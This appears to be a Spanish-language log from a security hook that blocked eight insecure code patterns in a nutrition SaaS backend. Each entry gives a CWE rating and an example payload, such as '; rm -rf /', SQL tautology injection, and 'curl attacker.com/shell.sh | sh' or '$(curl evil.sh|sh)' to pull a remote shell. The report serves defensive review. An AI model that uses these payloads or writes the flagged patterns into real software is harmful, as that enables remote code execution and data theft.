child_process.exec con template string interpolando patientId del usuario. Si patientId contiene ; rm -rf / o similar, el shell lo ejecutará. RCE inmediato.NutriFlow SaaS · Proyecto nutriflow-backend · 8 bloqueos interceptados
sess_nutriflow_20260612_143201
Hook: security_reminder_hook.py v2.7.3
Estado caché: ~/.claude/security_warnings_state_143201.json
Hora inicio: 14:32:01 · Fin: 15:18:44
child_process.exec con template string interpolando patientId del usuario. Si patientId contiene ; rm -rf / o similar, el shell lo ejecutará. RCE inmediato.searchTerm directamente en la query. Payload ' OR '1'='1 expone todos los pacientes. RGPD breach potencial.dangerouslySetInnerHTML con contenido de notas clínicas sin sanitizar. Un atacante con acceso de escritura podría inyectar <script> y robar tokens de sesión de médicos.pickle serializa objetos Python arbitrarios. Si el archivo .pkl es comprometido (supply chain) o servido a clientes, la deserialización ejecuta código arbitrario (RCE). Crítico si la API carga el modelo en cada request.os.system con f-string interpolando dataset_path. Si el path viene de un upload de usuario, payload ; curl attacker.com/shell.sh | sh ejecuta shell remota.eval() con template de usuario. Un dietista malicioso puede inyectar ${process.env} y exfiltrar todas las variables de entorno (API keys, DB credentials).${{ github.event.head_commit.message }} en run:. Un commit con mensaje $(curl evil.sh|sh) ejecuta código en el runner de CI con acceso a secrets.yaml.unsafe_load permite tags !!python/object/apply que ejecutan funciones arbitrarias de Python al deserializar. Cualquier config de un dietista podría ejecutar código en el servidor.| # | Patrón detectado | Archivo | Categoría | CVE/CWE | Severidad | Estado |
|---|---|---|---|---|---|---|
| 1 | child_process.exec() | api/routes/report.js | Command Injection | CWE-78 | CRÍTICO | 🚫 Bloqueado |
| 2 | SQL + template literal | api/db/queries.js | SQL Injection | CWE-89 | CRÍTICO | 🚫 Bloqueado |
| 3 | dangerouslySetInnerHTML | frontend/NoteEditor.jsx | React XSS | CWE-79 | ALTO | 🚫 Bloqueado |
| 4 | pickle.dump/load | scripts/export_model.py | Deserialization RCE | CWE-502 | CRÍTICO | 🚫 Bloqueado |
| 5 | os.system(f-string) | scripts/data_processor.py | Command Injection | CWE-78 | ALTO | 🚫 Bloqueado |
| 6 | eval() | api/utils/template_engine.js | Code Injection | CWE-95 | ALTO | 🚫 Bloqueado |
| 7 | ${{ github.event.* }} | .github/workflows/deploy.yml | Workflow Injection | CWE-77 | MEDIO | 🚫 Bloqueado |
| 8 | yaml.unsafe_load() | api/utils/config_loader.py | YAML Deser. RCE | CWE-502 | MEDIO | 🚫 Bloqueado |